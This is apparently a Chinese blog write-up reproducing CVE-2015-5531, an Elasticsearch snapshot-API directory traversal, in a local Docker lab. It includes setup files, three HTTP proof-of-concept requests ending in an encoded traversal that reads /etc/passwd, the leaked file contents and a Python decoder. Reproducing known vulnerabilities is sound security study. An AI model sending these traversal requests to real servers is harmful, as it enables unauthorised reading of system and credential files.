【漏洞复现】CVE-2015-5531 Arbitrary File Reading

Mitch3112024-12-25 12:43

漏洞信息

NVD - CVE-2015-5531

Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

背景介绍

Elasticsearch is an open source distributed, RESTful search and analytics engine, scalable data store, and vector database capable of addressing a growing number of use cases. As the heart of the Elastic Stack, it centrally stores your data for lightning-fast search, fine‑tuned relevancy, and powerful analytics that scale with ease.

主页:https://www.elastic.co/elasticsearch

源码:https://github.com/elastic/elasticsearch

环境搭建

Dockerfile

dockerfile 复制代码 
FROM vulhub/elasticsearch:1.6.0

LABEL maintainer="phithon <root@leavesongs.com>"

COPY elasticsearch.yml ./config/

RUN set -ex \
    && mkdir -p ./repo

docker-compose.yaml

yaml 复制代码 
version: '2'
services:
 es:
   build: .
   ports:
    - "9200:9200"
    - "9300:9300"

elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。所以需要在同级目录下创建一个elasticsearch.yml,内容如下:

yaml 复制代码 
path.repo: /usr/share/elasticsearch/repo

使用Docker Compose构建和启动环境:

sh 复制代码 
$ docker-compose up -d

Debug:

sh 复制代码 
ERROR: for es  'ContainerConfig'
Traceback (most recent call last):
  File "bin/docker-compose", line 3, in <module>
  File "compose/cli/main.py", line 67, in main
  File "compose/cli/main.py", line 126, in perform_command
  File "compose/cli/main.py", line 1070, in up
  File "compose/cli/main.py", line 1066, in up
  File "compose/project.py", line 648, in up
  File "compose/parallel.py", line 108, in parallel_execute
  File "compose/parallel.py", line 206, in producer
  File "compose/project.py", line 634, in do
  File "compose/service.py", line 579, in execute_convergence_plan
  File "compose/service.py", line 501, in _execute_convergence_recreate
  File "compose/parallel.py", line 108, in parallel_execute
  File "compose/parallel.py", line 206, in producer
  File "compose/service.py", line 494, in recreate
  File "compose/service.py", line 613, in recreate_container
  File "compose/service.py", line 332, in create_container
  File "compose/service.py", line 917, in _get_container_create_options
  File "compose/service.py", line 957, in _build_container_volume_options
  File "compose/service.py", line 1532, in merge_volume_bindings
  File "compose/service.py", line 1562, in get_container_data_volumes
KeyError: 'ContainerConfig'
[5518] Failed to execute script docker-compose

# down --volumes 会停止并删除所有容器和关联的卷
# --remove-orphans 会清除任何不再在 docker-compose.yml 文件中定义的孤立容器
$ docker-compose down --volumes --remove-orphans
$ docker-compose up -d --build

漏洞复现

参考:https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531

首先创建一个仓库:

在仓库里创建一个快照:

目录穿越读取任意文件,以/etc/passwd为例:

得到的文本通过ASCII解码即可得到如下内容(解码器脚本见附录):

plaintext 复制代码 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/bin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/games/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/var/proxy:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:irc:/var/run/irc:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System:/var/lib/gnats:/usr/sbin/nologin
nobody:x:99:99:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:101:101:systemd Core Dump:/var/lib/systemd/coredump:/usr/sbin/nologin
systemd-network:x:102:102:systemd Network Management:/lib/systemd/network:/usr/sbin/nologin
systemd-oom:x:103:103:systemd Out Of Memory Killer:/lib/systemd/oom:/usr/sbin/nologin
systemd-resolve:x:104:104:systemd Resolver:/lib/systemd/resolv:/usr/sbin/nologin
systemd-timesync:x:105:105:systemd Time Synchronization:/lib/systemd/timesync:/usr/sbin/nologin
messagebus:x:106:107:messagebus:/var/run/dbus:/usr/sbin/nologin
uuid:x:107:107:uuid:/run/uuid:/usr/sbin/nologin
syslog:x:108:108:syslog:/var/log:/usr/sbin/nologin
_ssh:x:109:109:_ssh:/var/run/sshd:/usr/sbin/nologin
git:x:110:110:git:/usr/lib/git:/usr/sbin/nologin

POC_1:

http 复制代码 
PUT /_snapshot/test HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test" 
    }
}

POC_2:

http 复制代码 
PUT /_snapshot/test2 HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
    }
}

POC_3:

http 复制代码 
GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

附录

Dec.py

python 复制代码 
# 给定的 ASCII 数字序列
numbers = [
    114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104,
    10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 
    58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 
    105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 
    58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 
    103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 
    105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 
    114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 
    58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 
    47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 
    47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 
    109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 
    47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 
    58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 
    108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 
    112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 
    114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 
    98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 
    119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 
    111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 
    47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 
    116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 111, 103, 105, 110
]

# 将数字序列转换为字符
decoded_text = ''.join(chr(num) for num in numbers)

# 输出解码后的文本
print(decoded_text)
相关推荐
白学还是没白学?14 小时前
exec db docker from A to B
数据库·docker·容器
WGS.14 小时前
docker run 报错:ImportError: PyCapsule_Import could not import module “datetime“
docker
小白勇闯网安圈14 小时前
upload、very_easy_sql、i-got-id-200
python·网络安全·web
悟空码字14 小时前
SpringBoot 整合 ElasticSearch,给搜索插上“光速翅膀”
java·后端·elasticsearch
logic_514 小时前
DHCP+DNS
网络安全·udp·信号处理
萨文 摩尔杰14 小时前
Docker
docker
Elasticsearch14 小时前
开始使用 Elastic Agent Builder 和 Strands Agents SDK
elasticsearch
Lethehong15 小时前
从零到精通:Docker容器化完整指南与实战练习
运维·docker·容器
爱浦路 IPLOOK15 小时前
高校5G实验室助力人才培养的五种创新模式
计算机网络·5g·网络安全·可信计算技术
AI逐月15 小时前
Git 停止追踪已提交文件问题
大数据·git·elasticsearch
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04Open-AutoGLM Windows 安装部署教程05【AutoGLM部署】本地私有化部署AI手机Agent06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser08【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)09安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)10BongoCat - 跨平台键盘猫动画工具